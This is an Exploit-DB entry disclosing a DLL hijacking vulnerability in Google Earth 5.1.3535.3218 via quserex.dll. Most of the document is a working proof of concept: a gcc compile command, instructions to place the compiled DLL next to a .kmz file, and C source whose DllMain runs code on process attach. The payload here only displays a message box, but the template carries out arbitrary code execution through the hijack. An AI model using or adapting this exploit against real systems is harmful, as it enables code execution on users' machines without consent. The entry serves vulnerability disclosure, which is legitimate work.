Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking

EDB-ID:

14790


Author:

LiquidWorm

Type:

local


Platform:

Windows

Date:

2010-08-25


/*

 Google Earth v5.1.3535.3218 (quserex.dll) DLL Hijacking Exploit

 Vendor: Google Inc.
 Product Web Page: http://www.google.com
 Affected Version: 5.1.3535.3218

 Summary: Google Earth lets you fly anywhere on Earth to view
 satellite imagery, maps, terrain, 3D buildings, from galaxies
 in outer space to the canyons of the ocean. You can explore
 rich geographical content, save your toured places, and share
 with others.

 Desc: Google Earth suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local
 level. The vulnerable extension is .kmz thru quserex.dll and
 wintab32.dll libraries.

 ----
 gcc -shared -o quserex.dll googlee.c

 Compile and rename to quserex.dll, create a file test.kmz and put
 both files in same dir and execute.
 ----

 Tested on Microsoft Windows XP Professional SP3 (EN)



 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk


 25.08.2010

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}